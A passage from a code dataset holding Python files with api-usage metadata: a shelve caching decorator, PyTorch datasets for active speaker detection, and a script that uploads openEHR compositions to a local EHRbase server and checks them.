"line_number": 167,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 172,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 172,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 173,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 177,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 177,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 183,
"usage_type": "attribute"
},
{
"api_name": "numpy.load",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 185,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 185,
"usage_type": "attribute"
},
{
"api_name": "numpy.min",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 191,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 196,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 199,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 200,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 201,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 202,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 204,
"usage_type": "call"
},
{
"api_name": "numpy.max",
"line_number": 204,
"usage_type": "call"
},
{
"api_name": "numpy.min",
"line_number": 205,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "numpy.newaxis",
"line_number": 213,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.functional.interpolate",
"line_number": 214,
"usage_type": "call"
},
{
"api_name": "torch.nn.functional",
"line_number": 214,
"usage_type": "name"
},
{
"api_name": "torch.tensor",
"line_number": 216,
"usage_type": "call"
},
{
"api_name": "torch.float",
"line_number": 216,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 219,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 223,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 223,
"usage_type": "attribute"
},
{
"api_name": "os.listdir",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "numpy.load",
"line_number": 231,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 231,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 231,
"usage_type": "attribute"
},
{
"api_name": "random.randrange",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 240,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "torch.from_numpy",
"line_number": 243,
"usage_type": "call"
},
{
"api_name": "torch.tensor",
"line_number": 243,
"usage_type": "call"
}
] |
8560654831
|
"""Bad style, but I don't know better where to put this."""
import logging
import shelve
from functools import wraps
logger = logging.getLogger(__name__)
def shelve_memoize(filename):
"""On-disk cache decorator using shelve."""
def decorator_shelve_memoize(func):
@wraps(func)
def wrapper_shelve_memoize(arxiv_id, *args, **kwargs):
assert len(args) == 0
assert len(kwargs) == 0
with shelve.open(filename) as db: # noqa: S301
if arxiv_id not in db:
logger.debug(f"{arxiv_id} was not found in the local metadata db. Requesting…")
db[arxiv_id] = func(arxiv_id)
                return db.get(arxiv_id)
        return wrapper_shelve_memoize
    return decorator_shelve_memoize
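
# A minimal demo of the decorator, assuming a throwaway shelve file; the fetch
# function below is a stand-in for a real metadata request.
if __name__ == "__main__":
    @shelve_memoize("demo-metadata.shelve")
    def fetch(arxiv_id):
        return {"id": arxiv_id}

    print(fetch("2101.00001"))  # a second call with the same id is served from the cache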
|
leogott/document-clustering
|
utils.py
|
utils.py
|
py
| 755 |
python
|
en
|
code
| null |
github-code
|
6
|
[
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "shelve.open",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "functools.wraps",
"line_number": 12,
"usage_type": "call"
}
] |
42786347897
|
import os
import math
import glob
import time
import random
import torch
from PIL import Image
from torch.utils import data
from torchvision.transforms import RandomCrop
import numpy as np
import core.io as io
import core.clip_utils as cu
import multiprocessing as mp
class CachedAVSource(data.Dataset):
def __init__(self):
# Cached data
self.entity_data = {}
self.speech_data = {}
self.entity_list = []
        # Reproducibility
random.seed(42)
np.random.seed(0)
def _postprocess_speech_label(self, speech_label):
speech_label = int(speech_label)
if speech_label == 2: # Remember 2 = SPEAKING_NOT_AUDIBLE
speech_label = 0
return speech_label
def _postprocess_entity_label(self, entity_label):
entity_label = int(entity_label)
if entity_label == 2: # Remember 2 = SPEAKING_NOT_AUDIBLE
entity_label = 0
return entity_label
def _cache_entity_data(self, csv_file_path):
entity_set = set()
csv_data = io.csv_to_list(csv_file_path)
csv_data.pop(0) # CSV header
for csv_row in csv_data:
video_id = csv_row[0]
entity_id = csv_row[-3]
timestamp = csv_row[1]
speech_label = self._postprocess_speech_label(csv_row[-2])
entity_label = self._postprocess_entity_label(csv_row[-2])
minimal_entity_data = (entity_id, timestamp, entity_label)
# Store minimal entity data
if video_id not in self.entity_data.keys():
self.entity_data[video_id] = {}
if entity_id not in self.entity_data[video_id].keys():
self.entity_data[video_id][entity_id] = []
entity_set.add((video_id, entity_id))
self.entity_data[video_id][entity_id].append(minimal_entity_data)
#Store speech meta-data
if video_id not in self.speech_data.keys():
self.speech_data[video_id] = {}
if timestamp not in self.speech_data[video_id].keys():
self.speech_data[video_id][timestamp] = speech_label
            # max over entities: 1 if anyone is speaking at this timestamp
new_speech_label = max(self.speech_data[video_id][timestamp], speech_label)
self.speech_data[video_id][timestamp] = new_speech_label
return entity_set
def _cache_entity_data_forward(self, csv_file_path, target_video):
entity_list = list()
csv_data = io.csv_to_list(csv_file_path)
csv_data.pop(0) # CSV header
for csv_row in csv_data:
video_id = csv_row[0]
if video_id != target_video:
continue
entity_id = csv_row[-3]
timestamp = csv_row[1]
entity_label = self._postprocess_entity_label(csv_row[-2])
entity_list.append((video_id, entity_id, timestamp))
            minimal_entity_data = (entity_id, timestamp, entity_label)  # safe to ignore the label here
if video_id not in self.entity_data.keys():
self.entity_data[video_id] = {}
if entity_id not in self.entity_data[video_id].keys():
self.entity_data[video_id][entity_id] = []
self.entity_data[video_id][entity_id].append(minimal_entity_data)
return entity_list
def _entity_list_postprocessing(self, entity_set):
print('Initial', len(entity_set))
# filter out missing data on disk
all_disk_data = set(os.listdir(self.video_root))
for video_id, entity_id in entity_set.copy():
if entity_id not in all_disk_data:
entity_set.remove((video_id, entity_id))
        print('Pruned entities not on disk', len(entity_set))
self.entity_list = sorted(list(entity_set))
class AudioVideoDatasetAuxLosses(CachedAVSource):
def __init__(self, audio_root, video_root, csv_file_path, clip_lenght,
target_size, video_transform=None, do_video_augment=False):
super().__init__()
# Data directories
self.audio_root = audio_root
self.video_root = video_root
# Post-processing
self.video_transform = video_transform
self.do_video_augment = do_video_augment
# Clip arguments
self.clip_lenght = clip_lenght
self.half_clip_length = math.floor(self.clip_lenght/2)
self.target_size = target_size
entity_set = self._cache_entity_data(csv_file_path)
self._entity_list_postprocessing(entity_set)
def __len__(self):
return int(len(self.entity_list)/1)
def __getitem__(self, index):
#Get meta-data
video_id, entity_id = self.entity_list[index]
entity_metadata = self.entity_data[video_id][entity_id]
audio_offset = float(entity_metadata[0][1])
mid_index = random.randint(0, len(entity_metadata)-1)
midone = entity_metadata[mid_index]
target = int(midone[-1])
target_audio = self.speech_data[video_id][midone[1]]
clip_meta_data = cu.generate_clip_meta(entity_metadata, mid_index,
self.half_clip_length)
video_data, audio_data = io.load_av_clip_from_metadata(clip_meta_data,
self.video_root, self.audio_root, audio_offset,
self.target_size)
if self.do_video_augment:
# random flip
if bool(random.getrandbits(1)):
video_data = [s.transpose(Image.FLIP_LEFT_RIGHT) for s in video_data]
# random crop
width, height = video_data[0].size
f = random.uniform(0.5, 1)
i, j, h, w = RandomCrop.get_params(video_data[0], output_size=(int(height*f), int(width*f)))
video_data = [s.crop(box=(j, i, w, h)) for s in video_data]
if self.video_transform is not None:
video_data = [self.video_transform(vd) for vd in video_data]
video_data = torch.cat(video_data, dim=0)
return (np.float32(audio_data), video_data), target, target_audio
class AudioVideoDatasetAuxLossesForwardPhase(CachedAVSource):
def __init__(self, target_video, audio_root, video_root, csv_file_path, clip_lenght,
target_size, video_transform=None, do_video_augment=False):
super().__init__()
# Data directories
self.audio_root = audio_root
self.video_root = video_root
# Post-processing
self.video_transform = video_transform
self.do_video_augment = do_video_augment
self.target_video = target_video
# Clip arguments
self.clip_lenght = clip_lenght
self.half_clip_length = math.floor(self.clip_lenght/2)
self.target_size = target_size
self.entity_list = self._cache_entity_data_forward(csv_file_path, self.target_video )
print('len(self.entity_list)', len(self.entity_list))
def _where_is_ts(self, entity_metadata, ts):
for idx, val in enumerate(entity_metadata):
if val[1] == ts:
return idx
raise Exception('time stamp not found')
def __len__(self):
return int(len(self.entity_list))
def __getitem__(self, index):
#Get meta-data
video_id, entity_id, ts = self.entity_list[index]
entity_metadata = self.entity_data[video_id][entity_id]
audio_offset = float(entity_metadata[0][1])
mid_index = self._where_is_ts(entity_metadata, ts)
midone = entity_metadata[mid_index]
gt = midone[-1]
clip_meta_data = cu.generate_clip_meta(entity_metadata, mid_index,
self.half_clip_length)
video_data, audio_data = io.load_av_clip_from_metadata(clip_meta_data,
self.video_root, self.audio_root, audio_offset,
self.target_size)
if self.do_video_augment:
# random flip
if bool(random.getrandbits(1)):
video_data = [s.transpose(Image.FLIP_LEFT_RIGHT) for s in video_data]
# random crop
width, height = video_data[0].size
f = random.uniform(0.5, 1)
i, j, h, w = RandomCrop.get_params(video_data[0], output_size=(int(height*f), int(width*f)))
video_data = [s.crop(box=(j, i, w, h)) for s in video_data]
if self.video_transform is not None:
video_data = [self.video_transform(vd) for vd in video_data]
video_data = torch.cat(video_data, dim=0)
return np.float32(audio_data), video_data, video_id, ts, entity_id, gt
#ASC Datasets
class ContextualDataset(data.Dataset):
def get_speaker_context(self, ts_to_entity, video_id, target_entity_id,
center_ts, candidate_speakers):
context_entities = list(ts_to_entity[video_id][center_ts])
random.shuffle(context_entities)
context_entities.remove(target_entity_id)
        if not context_entities:  # the context list ended up empty
context_entities.insert(0, target_entity_id) # make sure is at 0
while len(context_entities) < candidate_speakers:
context_entities.append(random.choice(context_entities))
elif len(context_entities) < candidate_speakers:
context_entities.insert(0, target_entity_id) # make sure is at 0
while len(context_entities) < candidate_speakers:
context_entities.append(random.choice(context_entities[1:]))
else:
context_entities.insert(0, target_entity_id) # make sure is at 0
context_entities = context_entities[:candidate_speakers]
return context_entities
def _decode_feature_data_from_csv(self, feature_data):
feature_data = feature_data[1:-1]
feature_data = feature_data.split(',')
return np.asarray([float(fd) for fd in feature_data])
def get_time_context(self, entity_data, video_id, target_entity_id,
center_ts, half_time_length, stride):
all_ts = list(entity_data[video_id][target_entity_id].keys())
center_ts_idx = all_ts.index(str(center_ts))
start = center_ts_idx-(half_time_length*stride)
end = center_ts_idx+((half_time_length+1)*stride)
selected_ts_idx = list(range(start, end, stride))
selected_ts = []
for idx in selected_ts_idx:
if idx < 0:
idx = 0
if idx >= len(all_ts):
idx = len(all_ts)-1
selected_ts.append(all_ts[idx])
return selected_ts
def get_time_indexed_feature(self, video_id, entity_id, selectd_ts):
time_features = []
for ts in selectd_ts:
time_features.append(self.entity_data[video_id][entity_id][ts][0])
return np.asarray(time_features)
def _cache_feature_file(self, csv_file):
entity_data = {}
feature_list = []
ts_to_entity = {}
print('load feature data', csv_file)
csv_data = io.csv_to_list(csv_file)
for csv_row in csv_data:
video_id = csv_row[0]
ts = csv_row[1]
entity_id = csv_row[2]
features = self._decode_feature_data_from_csv(csv_row[-1])
label = int(float(csv_row[3]))
# entity_data
if video_id not in entity_data.keys():
entity_data[video_id] = {}
if entity_id not in entity_data[video_id].keys():
entity_data[video_id][entity_id] = {}
if ts not in entity_data[video_id][entity_id].keys():
entity_data[video_id][entity_id][ts] = []
entity_data[video_id][entity_id][ts] = (features, label)
feature_list.append((video_id, entity_id, ts))
# ts_to_entity
if video_id not in ts_to_entity.keys():
ts_to_entity[video_id] = {}
if ts not in ts_to_entity[video_id].keys():
ts_to_entity[video_id][ts] = []
ts_to_entity[video_id][ts].append(entity_id)
print('loaded ', len(feature_list), ' features')
return entity_data, feature_list, ts_to_entity
class ASCFeaturesDataset(ContextualDataset):
def __init__(self, csv_file_path, time_lenght, time_stride,
candidate_speakers):
# Space config
self.time_lenght = time_lenght
self.time_stride = time_stride
self.candidate_speakers = candidate_speakers
self.half_time_length = math.floor(self.time_lenght/2)
# In memory data
self.feature_list = []
self.ts_to_entity = {}
self.entity_data = {}
# Load metadata
self._cache_feature_data(csv_file_path)
# Parallel load of feature files
def _cache_feature_data(self, dataset_dir):
pool = mp.Pool(int(mp.cpu_count()/2))
files = glob.glob(dataset_dir)
results = pool.map(self._cache_feature_file, files)
pool.close()
for r_set in results:
e_data, f_list, ts_ent = r_set
print('unpack ', len(f_list))
self.entity_data.update(e_data)
self.feature_list.extend(f_list)
self.ts_to_entity.update(ts_ent)
def __len__(self):
return int(len(self.feature_list))
def __getitem__(self, index):
video_id, target_entity_id, center_ts = self.feature_list[index]
entity_context = self.get_speaker_context(self.ts_to_entity, video_id,
target_entity_id, center_ts,
self.candidate_speakers)
target = self.entity_data[video_id][target_entity_id][center_ts][1]
feature_set = np.zeros((self.candidate_speakers, self.time_lenght, 1024))
for idx, ctx_entity in enumerate(entity_context):
time_context = self.get_time_context(self.entity_data,
video_id,
ctx_entity, center_ts,
self.half_time_length,
self.time_stride)
features = self.get_time_indexed_feature(video_id, ctx_entity,
time_context)
feature_set[idx, ...] = features
feature_set = np.asarray(feature_set)
feature_set = np.swapaxes(feature_set, 0, 2)
return np.float32(feature_set), target
class ASCFeaturesDatasetForwardPhase(ContextualDataset):
def __init__(self, csv_file_path, time_lenght, time_stride,
candidate_speakers):
# Space config
self.time_lenght = time_lenght
self.time_stride = time_stride
self.candidate_speakers = candidate_speakers
self.half_time_length = math.floor(self.time_lenght/2)
# In memory data
self.feature_list = []
self.ts_to_entity = {}
self.entity_data = {}
        # Single video metadata
self.entity_data, self.feature_list, self.ts_to_entity = self._cache_feature_file(csv_file_path)
def __len__(self):
return int(len(self.feature_list))
def __getitem__(self, index):
video_id, target_entity_id, center_ts = self.feature_list[index]
entity_context = self.get_speaker_context(self.ts_to_entity, video_id,
target_entity_id, center_ts,
self.candidate_speakers)
feature_set = np.zeros((self.candidate_speakers, self.time_lenght, 1024))
for idx, ctx_entity in enumerate(entity_context):
time_context = self.get_time_context(self.entity_data,
video_id,
ctx_entity, center_ts,
self.half_time_length,
self.time_stride)
features = self.get_time_indexed_feature(video_id, ctx_entity,
time_context)
feature_set[idx, ...] = features
feature_set = np.asarray(feature_set)
feature_set = np.swapaxes(feature_set, 0, 2)
return np.float32(feature_set), video_id, center_ts, target_entity_id
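
# A minimal wiring sketch, assuming pre-extracted feature csv files; the glob pattern,
# window length, stride and candidate count are placeholders, not project defaults.
if __name__ == "__main__":
    from torch.utils.data import DataLoader

    dataset = ASCFeaturesDataset('features/train/*.csv', time_lenght=11,
                                 time_stride=1, candidate_speakers=3)
    loader = DataLoader(dataset, batch_size=16, shuffle=True)
    feats, targets = next(iter(loader))
    # feats stacks one 1024-d feature per candidate speaker across the temporal window
    print(feats.shape, targets.shape)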
|
fuankarion/active-speakers-context
|
core/dataset.py
|
dataset.py
|
py
| 16,534 |
python
|
en
|
code
| 52 |
github-code
|
6
|
[
{
"api_name": "torch.utils.data.Dataset",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "random.seed",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "core.io.csv_to_list",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 43,
"usage_type": "name"
},
{
"api_name": "core.io.csv_to_list",
"line_number": 77,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 77,
"usage_type": "name"
},
{
"api_name": "os.listdir",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 127,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 142,
"usage_type": "call"
},
{
"api_name": "core.clip_utils.generate_clip_meta",
"line_number": 147,
"usage_type": "call"
},
{
"api_name": "core.clip_utils",
"line_number": 147,
"usage_type": "name"
},
{
"api_name": "core.io.load_av_clip_from_metadata",
"line_number": 149,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 149,
"usage_type": "name"
},
{
"api_name": "random.getrandbits",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "PIL.Image.FLIP_LEFT_RIGHT",
"line_number": 156,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image",
"line_number": 156,
"usage_type": "name"
},
{
"api_name": "random.uniform",
"line_number": 160,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop.get_params",
"line_number": 161,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop",
"line_number": 161,
"usage_type": "name"
},
{
"api_name": "torch.cat",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 168,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "core.clip_utils.generate_clip_meta",
"line_number": 213,
"usage_type": "call"
},
{
"api_name": "core.clip_utils",
"line_number": 213,
"usage_type": "name"
},
{
"api_name": "core.io.load_av_clip_from_metadata",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 215,
"usage_type": "name"
},
{
"api_name": "random.getrandbits",
"line_number": 221,
"usage_type": "call"
},
{
"api_name": "PIL.Image.FLIP_LEFT_RIGHT",
"line_number": 222,
"usage_type": "attribute"
},
{
"api_name": "PIL.Image",
"line_number": 222,
"usage_type": "name"
},
{
"api_name": "random.uniform",
"line_number": 226,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop.get_params",
"line_number": 227,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.RandomCrop",
"line_number": 227,
"usage_type": "name"
},
{
"api_name": "torch.cat",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 234,
"usage_type": "call"
},
{
"api_name": "torch.utils.data.Dataset",
"line_number": 237,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data",
"line_number": 237,
"usage_type": "name"
},
{
"api_name": "random.shuffle",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 251,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 261,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 285,
"usage_type": "call"
},
{
"api_name": "core.io.csv_to_list",
"line_number": 293,
"usage_type": "call"
},
{
"api_name": "core.io",
"line_number": 293,
"usage_type": "name"
},
{
"api_name": "math.floor",
"line_number": 329,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Pool",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "multiprocessing.cpu_count",
"line_number": 341,
"usage_type": "call"
},
{
"api_name": "glob.glob",
"line_number": 342,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 363,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 374,
"usage_type": "call"
},
{
"api_name": "numpy.swapaxes",
"line_number": 375,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 376,
"usage_type": "call"
},
{
"api_name": "math.floor",
"line_number": 386,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 406,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 417,
"usage_type": "call"
},
{
"api_name": "numpy.swapaxes",
"line_number": 418,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 419,
"usage_type": "call"
}
] |
24957977468
|
#!/usr/bin/python3
'''Post the compositions in a given directory, optionally filtered by a basename.
Now one EHR per composition.
'''
import json
import logging
import requests
from url_normalize import url_normalize
import sys
import argparse
import os
from typing import Any,Callable
import re
from json_tools import diff
import collections
import uuid
def compare(firstjson:json,secondjson:json)->str:
    '''
    compare the given jsons and return the differences as a JSON string
    '''
one=flatten(firstjson)
two=flatten(secondjson)
return json.dumps((diff(one,two)),indent=4)
def change_naming(myjson:json)->json:
'''change naming convention on the json'''
return change_dict_naming_convention(myjson,convertcase)
def flatten(d:dict, parent_key:str='', sep:str='_')->dict:
items = []
for k, v in d.items():
new_key = parent_key + sep + k if parent_key else k
if isinstance(v, collections.abc.MutableMapping):
items.extend(flatten(v, new_key, sep=sep).items())
else:
items.append((new_key, v))
return dict(items)
def change_dict_naming_convention(d:Any, convert_function:Callable[[str],str])->dict:
"""
Convert a nested dictionary from one convention to another.
Args:
d (dict): dictionary (nested or not) to be converted.
convert_function (func): function that takes the string in one convention and returns it in the other one.
Returns:
Dictionary with the new keys.
"""
if not isinstance(d,dict):
return d
new = {}
for k, v in d.items():
new_v = v
if isinstance(v, dict):
new_v = change_dict_naming_convention(v, convert_function)
elif isinstance(v, list):
new_v = list()
for x in v:
new_v.append(change_dict_naming_convention(x, convert_function))
new[convert_function(k)] = new_v
return new
def convertcase(name:str)->str:
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
def analyze_comparison(comparison_results:str)->int:
    ndifferences=0
    for l in json.loads(comparison_results):
if "add" in l:
if("_uid" in l['add']): #ignore if it is _uid
continue
else:
ndifferences+=1
logging.debug(f"difference add:{l['add']} value={l['value']}")
elif "remove" in l:
ndifferences+=1
logging.debug(f"difference remove:{l['remove']} value={l['value']}")
elif "replace" in l:
if(l['replace'].endswith("time")):
if(l['value'][:18]==l['prev'][:18]):
continue
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
elif(l['value'].startswith('P') and l['value'].endswith('D')):
continue
else:
ndifferences+=1
logging.debug(f"difference replace:{l['replace']} value={l['value']} prev={l['prev']}")
return ndifferences
def create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid):
logging.debug('----POST EHR----')
body1='''
{
"_type" : "EHR_STATUS",
"name" : {
"_type" : "DV_TEXT",
"value" : "EHR Status"
},
"subject" : {
"_type" : "PARTY_SELF",
"external_ref" : {
"_type" : "PARTY_REF",
"namespace" : "BBMRI",
"type" : "PERSON",
"id" : {
"_type" : "GENERIC_ID",
'''
body2=f' "value" : "{patientid}",'
body3='''
"scheme" : "BBMRI"
}
}
},
"archetype_node_id" : "openEHR-EHR-EHR_STATUS.generic.v1",
"is_modifiable" : true,
"is_queryable" : true
}
'''
body=body1+body2+body3
logging.debug(f'body={body}')
# sys.exit(0)
ehrs = client.post(EHR_SERVER_BASE_URL + 'ehr', \
params={},headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json','Prefer': 'return={representation|minimal}'},\
data=body)
print(f'create ehr status_code={ehrs.status_code}')
logging.info(f'create ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehrs.headers={ehrs.headers}')
logging.debug(f'ehrs.text={ehrs.text}')
logging.debug(f'ehrs.json={ehrs.json}')
if(ehrs.status_code==409 and 'Specified party has already an EHR set' in json.loads(ehrs.text)['message']):
#get ehr summary by subject_id , subject_namespace
payload = {'subject_id':patientid,'subject_namespace':'BBMRI'}
ehrs = client.get(EHR_SERVER_BASE_URL + 'ehr', params=payload,headers={'Authorization':auth,'Content-Type':'application/JSON','Accept': 'application/json'})
print('ehr already existent')
logging.info('ehr already existent')
logging.debug('----GET EHR----')
print(f'get ehr: status_code={ehrs.status_code}')
logging.info(f'get ehr: status_code={ehrs.status_code}')
logging.debug(f'ehr url={ehrs.url}')
logging.debug(f'ehr.headers={ehrs.headers}')
logging.debug(f'ehr.text={ehrs.text}')
logging.debug(f'ehr.json={ehrs.json}')
ehrid=json.loads(ehrs.text)["ehr_id"]["value"]
print(f'Patient {patientid}: retrieved ehrid={ehrid}')
logging.info(f'Patient {patientid}: retrieved ehrid={ehrid}')
return ehrid
# print(f'ehrheaders={ehrs.headers}')
urlehrstring = ehrs.headers['Location']
ehridstring = "{"+urlehrstring.split("v1/ehr/",2)[2]
ehrid=uuid.UUID(ehridstring)
print(f'Patient {patientid}: ehrid={str(ehrid)}')
logging.info(f'Patient {patientid}: ehrid={str(ehrid)}')
return ehrid
def main():
print('COMPOSITIONS UPLOADER')
parser = argparse.ArgumentParser()
parser.add_argument('--loglevel',help='the logging level:DEBUG,INFO,WARNING,ERROR or CRITICAL',default='WARNING')
parser.add_argument('--inputdir',help='dir containing the compositions',default='RESULTS')
parser.add_argument('--basename',help='basename to filter compositions')
parser.add_argument('--templatename',help='template to use when posting',default='crc_cohort')
parser.add_argument('--check',action='store_true', help='check the missing leafs for leafs that should be there but are not')
args=parser.parse_args()
loglevel=getattr(logging, args.loglevel.upper(),logging.WARNING)
if not isinstance(loglevel, int):
raise ValueError('Invalid log level: %s' % loglevel)
logging.basicConfig(filename='./CompositionUploader.log',filemode='w',level=loglevel)
inputdir=args.inputdir
print(f'inputdir given: {inputdir}')
logging.info(f'inputdir given: {inputdir}')
if not os.path.exists(inputdir):
print(f'directory {inputdir} does not exist')
logging.error(f'directory {inputdir} does not exist')
sys.exit(1)
basename=args.basename
if(basename):
logging.info(f'basename given: {basename}')
print(f'basename given: {basename}')
check=False
if args.check:
check=True
print ('Check is set to true')
logging.info('Check is set to true')
#get the list of files
filelist=[]
if basename:
for file in os.listdir(inputdir):
if file.startswith(basename) and file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
else:
for file in os.listdir(inputdir):
if file.endswith(".json"):
logging.debug(f'file added {os.path.join(inputdir, file)}')
filelist.append(file)
# Now sort the list
filelist.sort(key=lambda a: int(a.split('_')[1]))
for i,f in enumerate(filelist):
logging.info(f'file {i+1} = {f}')
# Initialize the connection to ehrbase
EHR_SERVER_BASE_URL = 'http://localhost:8080/ehrbase/rest/openehr/v1/'
EHR_SERVER_BASE_URL_FLAT = 'http://localhost:8080/ehrbase/rest/ecis/v1/composition/'
client = requests.Session()
client.auth = ('ehrbase-user','SuperSecretPassword')
auth="Basic ZWhyYmFzZS11c2VyOlN1cGVyU2VjcmV0UGFzc3dvcmQ="
nfiles=len(filelist)
print(f'{nfiles} to insert')
logging.info(f'{nfiles} to insert')
#check if the template is already in the db
templatename=args.templatename
myurl=url_normalize(EHR_SERVER_BASE_URL + 'definition/template/adl1.4')
response = client.get(myurl,params={'format': 'JSON'},headers={'Authorization':auth,'Content-Type':'application/JSON'})
templates=[a["template_id"] for a in json.loads(response.text)]
if(templatename not in templates):
print(f'Missing template {templatename}')
logging.error(f'Missing template {templatename}')
sys.exit(1)
# loop over files and upload the compositions
myurl=url_normalize(EHR_SERVER_BASE_URL_FLAT)
compinserted=0
compok=0
for i,file in enumerate(filelist):
print(f'********FILE {i+1}/{nfiles} {file}********')
logging.info(f'********FILE {i+1}/{nfiles} {file}********')
filename=os.path.join(inputdir, file)
with open(filename) as json_file:
compositionjson = json.load(json_file)
patientid='Patient'+compositionjson[templatename.lower()+'/context/case_identification/patient_pseudonym']
print(f'Patientid={patientid}')
logging.info(f'Patientid={patientid}')
# create ehr
ehrid=create_ehr(client,EHR_SERVER_BASE_URL, auth,patientid)
# post composition
compositionjson=json.dumps(compositionjson)
response = client.post(myurl,
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json','Prefer':'return=representation'}, \
data=compositionjson \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't post the composition. Error={response.status_code}")
print(f'response.text {response.text}')
logging.info(f"Couldn't post the composition. Error={response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
compinserted+=1
print(f'Composition inserted')
compositionUid=json.loads(response.text)["compositionUid"]
print(f'compositionUid={compositionUid}')
logging.info(f'compositionUid={compositionUid}')
if(check):
print(f'checking...')
logging.info(f'checking...')
#get composition created and compare with the one posted
myurlu=url_normalize(EHR_SERVER_BASE_URL_FLAT+compositionUid)
response = client.get(myurlu, \
params={'ehrId':str(ehrid),'templateId':templatename,'format':'FLAT'}, \
headers={'Authorization':auth,'Content-Type':'application/json'}, \
)
if(response.status_code != 200 and response.status_code != 201):
print(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f"Couldn't retrieve the composition. Error{response.status_code}")
logging.info(f'response.headers {response.headers}')
logging.info(f'response.text {response.text}')
else:
origjson=json.loads(compositionjson)
retrievedjson=json.loads(response.text)["composition"]
origchanged=change_naming(origjson)
retrchanged=change_naming(retrievedjson)
comparison_results=compare(origchanged,retrchanged)
ndiff=analyze_comparison(comparison_results)
if(ndiff>0):
print('original and retrieved json differ')
logging.info('original and retrieved json differ')
logging.debug(f'comparison_results:')
logging.debug(comparison_results)
else:
print('original and retrieved json do not differ')
logging.info('original and retrieved json do not differ')
compok+=1
print(f'{compinserted}/{nfiles} compositions inserted successfully')
logging.info(f'{compinserted}/{nfiles} compositions inserted successfully')
print(f'{nfiles-compinserted}/{nfiles} compositions with errors')
